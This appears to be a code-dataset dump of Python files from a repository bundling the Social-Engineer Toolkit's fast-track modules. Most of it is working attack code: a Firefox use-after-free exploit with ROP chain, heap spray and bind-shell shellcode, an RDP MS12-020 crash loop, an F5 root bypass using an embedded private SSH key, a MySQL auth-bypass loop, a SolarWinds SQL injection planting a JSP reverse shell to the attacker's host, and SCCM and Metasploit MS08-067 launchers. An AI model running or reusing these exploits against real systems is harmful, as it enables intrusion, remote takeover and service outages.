id (int64, 0-458k) | file_name (string, 4-119 chars) | file_path (string, 14-227 chars) | content (string, 24-9.96M chars) | size (int64, 24-9.96M) | language (string, 1 class) | extension (string, 14 classes) | total_lines (int64, 1-219k) | avg_line_length (float64, 2.52-4.63M) | max_line_length (int64, 5-9.91M) | alphanum_fraction (float64, 0-1) | repo_name (string, 7-101 chars) | repo_stars (int64, 100-139k) | repo_forks (int64, 0-26.4k) | repo_open_issues (int64, 0-2.27k) | repo_license (string, 12 classes) | repo_extraction_date (string, 433 classes)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
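A minimal sketch of how rows with this schema might be streamed and filtered, assuming the corpus is published as a Hugging Face dataset; the dataset identifier "user/code-corpus" is a placeholder, not taken from this dump:

from datasets import load_dataset

# Hypothetical dataset id -- replace with the real repository name.
# Streaming avoids materializing all ~458k rows at once.
rows = load_dataset("user/code-corpus", split="train", streaming=True)

# Filter on the metadata columns listed in the header above.
for row in rows:
    if row["extension"] == ".py" and row["repo_stars"] >= 100:
        print(row["repo_name"], row["file_path"], row["total_lines"])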
2,285,800 | sccm_main.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/sccm/sccm_main.py | #!/usr/bin/python3
# coding=utf-8
import os
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("The" + core.bcolors.BOLD + " SCCM Attack Vector " + core.bcolors.ENDC +
"will utilize the SCCM configurations to deploy malicious software. \n\n"
"You need to have the SMSServer name and a PackageID you want to package "
"on the website. Then you need to copy this configuration file to the "
"startup directory for all of the users on the server.")
sms_server = input("Enter the IP address or hostname of the SMS Server: ")
package_id = input("Enter the Package ID of the package you want to patch: ")
configuration = '''
# configuration file written by Dave DeSimone and Bill Readshaw
# attack vector presented at Defcon 20
# added to set 07/27/2012
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
Next
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
'''.format(sms_server, package_id)
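# The VBScript above, patched with the user-supplied SMS server and Package ID,
# uses WMI to locate the SMS provider and site code, then calls
# RefreshPkgSource() on the chosen package so SCCM re-pulls the
# (attacker-modified) package source for deployment.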
# write out the file to reports
with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")
| 2,117 | Python | .py | 46 | 43.391304 | 124 | 0.750607 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,801 | ms08067.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/ms08067.py | #!/usr/bin/env python3
# coding=utf-8
#
#
# This has been redesigned to use the MS08-067 in Metasploit which is much more reliable.
#
#
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
def create_rc(revhost, victim, payload, port):
with open("/root/.set/ms08-067.rc" + "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n"
"set RHOST {1}\n"
"set LPORT {2}\n"
"set LHOST {3}\n"
"exploit\n\n".format(payload, victim, port, revhost))
def launch_msf():
subprocess.Popen("msfconsole -r /root/.set/ms08-067.rc", shell=True).wait()
revhost = input("Enter your LHOST (attacker IP address) for the reverse listener: ")
revport = input("Enter your LPORT (attacker port) for the reverse listener: ")
victim = input("Enter the RHOST (victim IP) for MS08-067: ")
payload = input("Enter your payload (example: windows/meterpreter/reverse_https) - just hit enter for reverse_https: ")
if not payload:
payload = "windows/meterpreter/reverse_https"
# create the rc file
create_rc(revhost, victim, payload, revport)
# launch msf
launch_msf()
| 1,302 | Python | .py | 35 | 31.714286 | 119 | 0.663225 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,802 | firefox_3_6_16.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/firefox_3_6_16.py | #!/usr/bin/env python3
# coding=utf-8
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr_Me
try: # Py2
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
except ImportError: # Py3
from http.server import BaseHTTPRequestHandler, HTTPServer
class myRequestHandler(BaseHTTPRequestHandler):
try:
def do_GET(self):
# Always Accept GET
self.printCustomHTTPResponse(200)
if self.path == "/":
target = self.client_address[0]
self.wfile.write("""
<html>
<body>
<applet code="rubik.class" width=140 height=140></applet>
<p><b>Mozilla mChannel Object use after free</b><br />
- Found by regenrecht<br />
- MSF exploit by Rh0<br />
- Win 7 fun version by mr_me</p>
<!--
Notes:
- This exploit requires <= java 6 update 25.
- optimized heap spray and still works on mutiple tabs as
the spray is large enough to hit the 0x10000000 block.
- If you really want the class file you can get it here:
http://javaboutique.internet.com/Rubik/rubik.class,
but java still loads without it.
- Tested on windows 7 ultimate (latest updates).
- http://bit.ly/qD4Jkc
-->
<object id="d"><object>
<script type="text/javascript">
function trigger(){
alert('ready?');
fakeobject = document.getElementById("d"); // allocate the object
fakeobject.QueryInterface(Components.interfaces.nsIChannelEventSink); // append to the objects available functions
fakeobject.onChannelRedirect(null,new Object,0); // free it
/*
fill the object with a fake vtable reference
just use the start of a block for simplicity and use \x00
because it expands to a NULL so that
when we have have the CALL DWORD PTR DS:[ECX+18], it will point to 0x10000000
*/
fakevtable = unescape("\x00%u1000");
var rop = "";
// 3 instructions to pivot cleanly
rop += unescape("%u1033%u6d7f"); // 0x6D7F1033 -> MOV EAX,[ECX] / PUSH EDI / CALL [EAX+4] <jvm.dll>
rop += unescape("%u10a7%u6d7f"); // 0x6D7F10A7 -> POP EBP / RETN <jvm.dll>
rop += unescape("%u1441%u6d7f"); // 0x6D7F1441 -> XCHG EAX,ESP / RETN <jvm.dll>
// generic rop taken from MSVCR71.dll (thanks to corelanc0d3r)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> Make EAX readable
rop += unescape("%u591f%u7c37"); // 0x7c37591f -> PUSH ESP / ... / POP ECX / POP EBP / RETN
rop += unescape("%uf004%ubeef"); // 0x41414141 -> EBP (filler)
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%ua140%u7c37"); // 0x7c37a140 -> *&VirtualProtect()
rop += unescape("%u30ea%u7c35"); // 0x7c3530ea -> MOV EAX,[EAX] / RETN
rop += unescape("%u6c0b%u7c34"); // 0x7c346c0b -> Slide, so next gadget would write to correct stack location
rop += unescape("%u6069%u7c37"); // 0x7c376069 -> MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EDI (filler)
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> will be patched at runtime (VP), then picked up into ESI
rop += unescape("%uf00d%ubeef"); // 0x41414141 -> EBX (filler)
rop += unescape("%u6402%u7c37"); // 0x7c376402 -> POP EBP / RETN
rop += unescape("%u5c30%u7c34"); // 0x7c345c30 -> ptr to 'push esp / ret '
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%udfff%uffff"); // 0xfffffdff -> size 0x00000201 -> ebx, modify if needed
rop += unescape("%u1e05%u7c35"); // 0x7c351e05 -> NEG EAX / RETN
rop += unescape("%u4901%u7c35"); // 0x7c354901 -> POP EBX / RETN
rop += unescape("%uffff%uffff"); // 0xffffffff -> pop value into ebx
rop += unescape("%u5255%u7c34"); // 0x7c345255 -> INC EBX / FPATAN / RETN
rop += unescape("%u2174%u7c35"); // 0x7c352174 -> ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
rop += unescape("%ud201%u7c34"); // 0x7c34d201 -> POP ECX / RETN
rop += unescape("%ub001%u7c38"); // 0x7c38b001 -> RW pointer (lpOldProtect) (-> ecx)
rop += unescape("%ub8d7%u7c34"); // 0x7c34b8d7 -> POP EDI / RETN
rop += unescape("%ub8d8%u7c34"); // 0x7c34b8d8 -> ROP NOP (-> edi)
rop += unescape("%u4f87%u7c34"); // 0x7c344f87 -> POP EDX / RETN
rop += unescape("%uffc0%uffff"); // 0xffffffc0 -> value to negate, target value : 0x00000040, target: edx
rop += unescape("%u1eb1%u7c35"); // 0x7c351eb1 -> NEG EDX / RETN
rop += unescape("%u6c0a%u7c34"); // 0x7c346c0a -> POP EAX / RETN
rop += unescape("%u9090%u9090"); // 0x90909090 -> NOPS (-> eax)
rop += unescape("%u8c81%u7c37"); // 0x7c378c81 -> PUSHAD / ADD AL,0EF / RETN
sc = rop;
// metasploit bind shell port 4444
sc += unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650%u5656%u5646%u564e%u5356%u6856%ucc79%u863f%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u41d5");
// create a string with a ptr to the offset of our rop
// used 0x1000001c to accomidate 0x18 + 0x4 (1st rop gadget)
var filler = unescape("%u001c%u1000");
while(filler.length < 0x100) {filler += filler;}
/*
create a string with 0x18 bytes at the start containing ptr's to the rop.
This is to account for the vtable offset (0x18) -> 'CALL DWORD PTR DS:[ECX+18]'
Then fill with sc + junk
*/
var chunk = filler.substring(0,0x18/2);
chunk += sc;
chunk += filler;
// create a string of size 64k in memory that contains sc + filler
var heapblock = chunk.substring(0,0x10000/2);
// keep adding more memory that contains sc + filler to reach 512kB
while (heapblock.length<0x80000) {heapblock += heapblock;}
/*
using a final string of 512kB so that the spray is fast but ensuring accuracy
- sub the block header length (0x24)
- sub 1/4 of a page for sc (0x400)
- sub the string length (0x04)
- sub the null byte terminator
*/
var finalspray = heapblock.substring(0,0x80000 - sc.length - 0x24/2 - 0x4/2 - 0x2/2);
// optimised spray, precision can still be reliable even with tabs.
// force allocation here of 128 blocks, using only 64MB of memory, speeeeeeed.
arrayOfHeapBlocks = new Array()
for (n=0;n<0x80;n++){
arrayOfHeapBlocks[n] = finalspray + sc;
}
}
trigger();
</script>
</body>
</html>
""")
self.wfile.write("""<title>Please wait...</title></head><body>""")
self.wfile.write("""<left><body bgcolor="Black"><font color="White">
Please wait<br>""")
print(("\n\n[-] Exploit sent... [-]\n"
"[-] Wait about 30 seconds and attempt to connect.[-]\n"
"[-] Connect to IP Address: {0} and port 4444 [-]".format(target)))
# Print custom HTTP Response
def printCustomHTTPResponse(self, respcode):
self.send_response(respcode)
self.send_header("Content-type", "text/html")
self.send_header("Server", "myRequestHandler")
self.end_headers()
# In case of exceptions, pass them
except:
pass
httpd = HTTPServer(('', 80), myRequestHandler)
print("""
#####################################################################################
# Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) by Mr. Me. #
#####################################################################################
""")
print(" [-] Starting Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) [-]")
print(" [-] Have someone connect to you on port 80 [-]")
print("\n\n <ctrl>-c to Cancel")
try:
# handle the connections
httpd.handle_request()
# Serve HTTP server forever
httpd.serve_forever()
# Except Keyboard Interrupts and throw custom message
except KeyboardInterrupt:
print("\n\n Exiting exploit...\n\n")
| 9,079 | Python | .py | 155 | 51.064516 | 1,053 | 0.631603 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,803 | rdpdos.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/rdpdos.py | # coding=utf-8
# Exploit Title: Pakyu Cenloder
# Date: March 16 2012
# Author: BMario
# Application Link: Microsoft Terminal Services / Remote Desktop Services
# http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
# Version: any Windows version before 13 Mar 2012
# Platforms: Windows
# Bug: use after free
# Exploitation: remote, versus server
# Author: Stanley Marshall
# Tested on: Windows 7 32bit
# CVE : MS12-020
import socket
import binascii
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("Microsoft Terminal Services / Remote Desktop Services - Denial of Service")
headpack = binascii.unhexlify(b"030000130ee000000000000100080000000000")
dafuq = b"030001d602f0807f658201940401010401010101f" \
b"f3019020400000000020400000002020400000000" \
b"0204000000010204000000000204000000010202f" \
b"fff02040000000230190204000000010204000000" \
b"01020400000001020400000001020400000000020" \
b"40000000102020420020400000002301c0202ffff" \
b"0202fc170202ffff0204000000010204000000000" \
b"204000000010202ffff0204000000020482013300" \
b"0500147c0001812a000800100001c000447563618" \
b"11c01c0d800040008008002e00101ca03aa090400" \
b"00ce0e000048004f0053005400000000000000000" \
b"00000000000000000000000000000000004000000" \
b"000000000c0000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000000000000000000000000" \
b"00000000000000000000001ca0100000000001000" \
b"07000100300030003000300030002d00300030003" \
b"0002d0030003000300030003000300030002d0030" \
b"00300030003000300000000000000000000000000" \
b"000000000000000000000000004c00c000d000000" \
b"0000000002c00c001b0000000000000003c02c000" \
b"3000000726470647200000000008080636c697072" \
b"6472000000a0c0726470736e640000000000c0"
dafuq = binascii.unhexlify(dafuq)
dafree = binascii.unhexlify(b"0300000802f08028")
trololo = headpack + dafuq + dafree
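# trololo is the raw byte sequence sent to the target: what appears to be an
# X.224 connection request (headpack), a large MCS connect-initial blob (dafuq)
# and a short channel-release packet (dafree). Opening a connection and sending
# this sequence repeatedly (10240 times below) triggers the MS12-020
# use-after-free and crashes the Remote Desktop service.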
#HOSTNYO = sys.argv[1]
HOSTNYO = input("Enter the IP address to crash (remote desktop): ")
PORTNYO = 3389
for i in range(10240):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOSTNYO, PORTNYO))
s.send(trololo)
rec = s.recv(1024)
s.close()
| 2,414 | Python | .py | 58 | 36.965517 | 82 | 0.766184 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,804 | f5.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/f5.py | #!/usr/bin/python3
# coding=utf-8
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.trustedsec.com
#
#
import os
import subprocess
try:
with open("priv.key", 'w') as filewrite:
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
print("""
Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
http://www.trustedsec.com
""")
ipaddr = input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@{0}".format(ipaddr), shell=True).wait()
finally:
if os.path.isfile("priv.key"):
os.remove("priv.key")
| 1,813 | Python | .py | 39 | 41.128205 | 82 | 0.772009 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,805 | mysql_bypass.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/mysql_bypass.py | #!/usr/bin/python3
# coding=utf-8
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.trustedsec.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
#
import subprocess
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""
This has to be the easiest "exploit" ever. Seriously. Embarrassed to submit this a little.
Title: MySQL Remote Root Authentication Bypass
Written by: Dave Kennedy (ReL1K)
http://www.trustedsec.com
Original advisory here: seclists.org/oss-sec/2012/q2/493
Note, you will see a number of failed login attempts, after about 300, if it doesn't
work, then it's not vulnerable.
""")
ipaddr = input("Enter the IP address of the mysql server: ")
while True:
subprocess.Popen("mysql --host={0} -u root mysql --password=blah".format(ipaddr), shell=True).wait()
| 1,006 | Python | .py | 31 | 30.870968 | 104 | 0.764706 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,806 | solarwinds.py | CHEGEBB_africana-framework/externals/set/src/fasttrack/exploits/solarwinds.py | #!/usr/bin/python3
# coding=utf-8
##########################################################################
# Exploit Title: Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit
# Date: May 2nd 2012
# Author: muts
# Version: SolarWinds Storage Manager 5.1.0
# Tested on: Windows 2003
# Archive Url : http://www.offensive-security.com/0day/solarshell.txt
##########################################################################
# Discovered by Digital Defence - DDIVRT-2011-39
##########################################################################
import ntpath
import random
import binascii
try: # Py2
from cookielib import CookieJar
from urllib2 import build_opener, HTTPCookieProcessor
from urllib import urlencode
except ImportError: # Py3
from http.cookiejar import CookieJar
from urllib.request import build_opener, HTTPCookieProcessor
from urllib.parse import urlencode
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("\n[*] Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit")
print("[*] Vulnerability discovered by Digital Defence - DDIVRT-2011-39")
print("[*] Offensive Security - http://www.offensive-security.com\n")
# if (len(sys.argv) != 4):
# print "[*] Usage: solarshell.py <RHOST> <LHOST> <LPORT>"
# exit(0)
# rhost = sys.argv[1]
# lhost = sys.argv[2]
# lport = sys.argv[3]
rhost = input("Enter the remote host IP address: ")
lhost = input("Enter the attacker IP address: ")
lport = input("Enter the local port: ")
filename = ''
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890', 6):
filename += i
filename += ".jsp"
output_path = ntpath.join("c:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/", filename)
jsp = '''<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{{
this.is = is;
this.os = os;
}}
public void run()
{{
BufferedReader in = null;
BufferedWriter out = null;
try
{{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{{
out.write( buffer, 0, length );
out.flush();
}}
}} catch( Exception e ){{}}
try
{{
if( in != null )
in.close();
if( out != null )
out.close();
}} catch( Exception e ){{}}
}}
}}
try
{{
Socket socket = new Socket( "{lhost}", {lport} );
Process process = Runtime.getRuntime().exec( "cmd.exe" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
}} catch( Exception e ) {{}}
%>'''.format(lhost=lhost, lport=lport)
jsp = jsp.replace("\n", "")
jsp = jsp.replace("\t", "")
prepayload = "AAA' "
prepayload += 'union select 0x{0},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "{1}"'.format(binascii.hexlify(jsp.encode('ascii')), output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate = 'checkLogin'
password = 'OHAI'
cj = CookieJar()
opener = build_opener(HTTPCookieProcessor(cj))
post_params = urlencode({'loginState': loginstate, 'loginName': prepayload, 'password': password})
print("[*] Sending evil payload")
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
print("[*] Triggering shell")
post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
opener.open("http://{0}:9000/{1}".format(rhost, filename))
print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
| 4,256 | Python | .py | 113 | 34.212389 | 143 | 0.644833 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,807 | qrgenerator.py | CHEGEBB_africana-framework/externals/set/src/qrcode/qrgenerator.py | # coding=utf-8
import os
import time
import src.core.setcore as core
import qrcode
# generate the qrcode and save it definition
def gen_qrcode(url):
# generate the qrcode
qr = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
qr.add_data(url)
qr.make()
im = qr.make_image()
time.sleep(1)
qr_img_path = os.path.join(core.userconfigpath, "reports/qrcode_attack.png")
if os.path.isfile(qr_img_path):
os.remove(qr_img_path)
# save the image out
im.save(qr_img_path, format='png')
# print that its been successful
core.print_status("QRCode has been generated under {0}".format(qr_img_path)) | 665 | Python | .py | 20 | 29.2 | 80 | 0.710938 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,808 | unsigned.py | CHEGEBB_africana-framework/externals/set/src/webattack/java_applet/unsigned.py | #!/usr/bin/python3
#
# simple jar file
#
import subprocess
import os
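# Rebuild the unsigned applet: remove old artifacts, compile Java.java, pack
# the resulting Java.class into Java_Update.jar, merge manifest.mf into the
# jar, and copy it into SET's html/unsigned directory as unsigned.jar.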
subprocess.Popen("rm Java_Update.jar", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("rm Java.class", stderr=subprocess.PIPE,
stdout=subprocess.PIPE, shell=True)
subprocess.Popen("javac Java.java", shell=True).wait()
subprocess.Popen("jar cvf Java_Update.jar Java.class", shell=True).wait()
subprocess.Popen("jar ufm Java_Update.jar manifest.mf", shell=True).wait()
subprocess.Popen(
"cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True)
print("[*] Jar file exported as Java_Update.jar")
| 639 | Python | .py | 16 | 36.5625 | 74 | 0.730337 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,809 | sign_jar.py | CHEGEBB_africana-framework/externals/set/src/webattack/java_applet/sign_jar.py | #!/usr/bin/env python3
#
# simple jar file
#
import subprocess
import os
try:
print("""
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
""")
print("""*** WARNING ***\nIN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk\n*** WARNING ***""")
# grab keystore to use later
subprocess.Popen(
"keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen(
"jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
"cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen(
"cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print("[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)")
except:
pass
| 1,288 | Python | .py | 33 | 35.545455 | 158 | 0.723065 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,810 | gen_payload.py | CHEGEBB_africana-framework/externals/set/src/webattack/browser_exploits/gen_payload.py | #!/usr/bin/env python3
# This module is for the metasploit browser exploits
import re
import os
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
definepath = os.getcwd()
me = mod_name()
port = ""
# see if multi_attack is being used and prep everything we need
multiattack = "off"
webdav_enabled = "off"
if os.path.isfile(userconfigpath + "multi_payload"):
multiattack = "on"
# just need a simple filewrite to generate a file if webdav is enabled
# this is used for multi attack, it will write out file to program junk
# then a simple check will determine if webdav is enabled for the port
webdav_enabled = "off"
webdav_write = open(userconfigpath + "webdav_enabled", "w")
fileopen = open(userconfigpath + "multi_payload", "r")
for line in fileopen:
match = re.search("MAIN=", line)
if match:
port = line.replace("MAIN=", "")
match2 = re.search("MAINPAYLOAD=", line)
if match2:
exploit = line.replace("MAINPAYLOAD=", line)
# grab metasploit path
metasploit_iframe = "8080"
msf_path = meta_path()
configfile = open("/etc/setoolkit/set.config", "r").readlines()
for line in configfile:
line = line.rstrip()
match4 = re.search("METERPRETER_MULTI_SCRIPT=", line)
if match4:
meterpreter_multi = line.replace("METERPRETER_MULTI_SCRIPT=", "")
match5 = re.search("METERPRETER_MULTI_COMMANDS=", line)
if match5:
meterpreter_multi_command = line.replace(
"METERPRETER_MULTI_COMMANDS=", "")
meterpreter_multi_command = meterpreter_multi_command.replace(
";", "\n")
match6 = re.search("METASPLOIT_IFRAME_PORT=", line)
if match6:
metasploit_iframe = line.replace("METASPLOIT_IFRAME_PORT=", "")
match7 = re.search("AUTO_MIGRATE=", line)
if match7:
auto_migrate = line.replace("AUTO_MIGRATE=", "")
# grab attack vector
attack_vector = ""
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector")
for line in fileopen:
attack_vector = line.rstrip()
# open ipaddr
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = input("Enter your ipaddress: ")
update_options("IPADDR=" + ipaddr)
debug_msg(me, "printing 'text.browser_exploits_menu'", 5)
show_browserexploit_menu = create_menu(
browser_exploits_text, browser_exploits_menu)
exploit = input(setprompt(["4"], ""))
if exploit == '':
print("\n Defaulting to IE CSS Import Use After Free exploit.....")
exploit = ("1")
# dictionary = ms_module
exploit = ms_module(exploit)
choice1 = ""
if multiattack == "off":
if exploit != "windows/browser/java_codebase_trust":
show_payload_menu_2 = create_menu(payload_menu_2_text, payload_menu_2)
choice1 = input(setprompt(["4"], ""))
if choice1 == '':
choice1 = '2'
choice1 = ms_payload(choice1)
# if we are using the java exploit
